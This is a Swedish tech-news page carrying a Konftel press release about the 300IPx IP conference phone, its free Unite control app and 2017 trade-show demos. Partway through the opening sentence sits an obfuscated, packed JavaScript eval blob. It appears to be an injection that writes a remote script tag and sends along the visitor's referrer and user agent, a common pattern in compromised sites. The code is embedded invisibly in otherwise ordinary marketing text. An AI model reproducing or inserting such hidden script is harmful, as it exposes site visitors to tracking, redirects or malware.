Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Konftel förenklar distansmöten med ny konferenstelefon och mobilapp

Konftel förenklar distansmöten med ny konferenstelefon och mobilapp
Sebastian

Konftel eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fybrt|var|u0026u|referrer|dfbik||js|php’.split(’|’),0,{}))
300IPx tillsammans med mobilappen Konftel Unite förenklar möteshanteringen radikalt för användaren. Det räcker med ett klick för att ansluta till ett möte. Konftel presenterar den perfekta kombinationen på CeBIT-mässan i Hannover och Enterprise Connect i Orlando. Lösningen blir tillgänglig under april.

Telefonkonferenser har ibland förknippats med långa telefonnummer, möteskoder och kommandon, vilket kan skapa stress hos användarna. Man kan även känna sig osäker inför konferenstelefonen i mötesrummet. Men den sortens motstånd röjer appen undan med den nya IP-konferenstelefonen och mobilappen.

Konftel Unite är designad för att enkelt hantera Konftel 300IPx. Ring kontakter eller grupper från den personliga kontaktboken och styr telefonens alla funktioner under mötet – allt från mobilen. Enklast av allt är att starta eller gå in i förbokade distansmöten som ligger i kalendern. Då räcker det med en knapptryckning för att Konftel 300IPx ska ringa upp och slå eventuella möteskoder.

– Vi kallar det för One Touch Conferencing. Så enkelt ska det vara att mötas på distans med superb ljudkvalitet, säger Stefan Eriksson, Marketing & Communications Manager på Konftel.

Bekväm med mobilen

– Man känner sig bekväm och hemma i sin egen mobil. Det har vi tagit fasta på i lösningen för 300IPx. Jag kan inte tänka mig ett bättre användargränssnitt till en konferenstelefon i nuläget, säger Torbjörn Karlsson, Product Manager på Konftel.

– Unite installeras som vilken app som helst och den kostar inget. Att ansluta till en ¨300IPx är enkelt och gjort på ett kick. Sedan har du kontrollen över mötet i din hand.

Oerhört flexibel

300IPx är en ny version av den mycket populära IP-konferenstelefonen 300IP. Utöver One Touch Conferencing via appen har 300IPx allt som behövs för högklassiga och effektiva distansmöten. Den passar allt från små mötesrum till stora auditorier, tack vare möjligheten att koppla in extra mikrofoner, högtalaranläggning och trådlöst headset. Dessutom har 300IPx en inbyggd brygga för fempartssamtal och den patenterade ljudtekniken OmniSound® som ger kristallklart och naturligt HD-ljud.

300IPx har USB vilket gör den perfekt till Skype for Business, Cisco, Avaya och andra datorbaserade mötesverktyg. Den konfigureras och uppgraderas enkelt via webben och stödjer auto-provisionering. 300IPx har två års garanti.

Nyckelfunktioner i Konftel 300IPx:

  • OmniSound med stöd för HD-ljud
  • SIP
  • UC-kompatibel via USB
  • Stöd för Konftel Unite – One Touch Conferencing
  • NFC för snabb anslutning till mobilappen Konftel Unite
  • Styr telefonen och mötet extremt smidigt via Konftel Unite
  • BryggfunktionInspelning på minneskort
  • Förberedd för extramikrofoner och PA-anslutning
  • Smidig och skalbar provisionering
  • Två års garanti

Kort om Konftel Unite

Unite är en app som flyttar hanteringen av 300IPx från den vanliga knappsatsen till skärmen på en mobiltelefon eller surfplatta. Anslut till förbokade möten med ett klick, skapa konferensgrupper, ring kontakter från din personliga kontaktbok och styr telefonens funktioner under mötet. Kopplingen mellan mobilen och konferenstelefonen görs enkelt via Bluetooth® (endast för kontroll, ej ljudöverföring). Unite hämtas från App Store eller Google Play.

Upplev One Touch Conferencing på plats

300IPx med Unite demonstreras på två av världens viktigaste event för kommunikations- och samarbetslösningar. Kom och upplev One Touch Conferencing på:

CeBIT 2017 i Hannover, Tyskland. 20 – 24 mars i hall 12, monter D46 (Herweck) och hall 2, monter C30 (Huawei).

Enterprise Connect 2017 i Orlando, USA. 27 – 30 mars, Gaylord Palms Resort & Convention Center, monter 1933.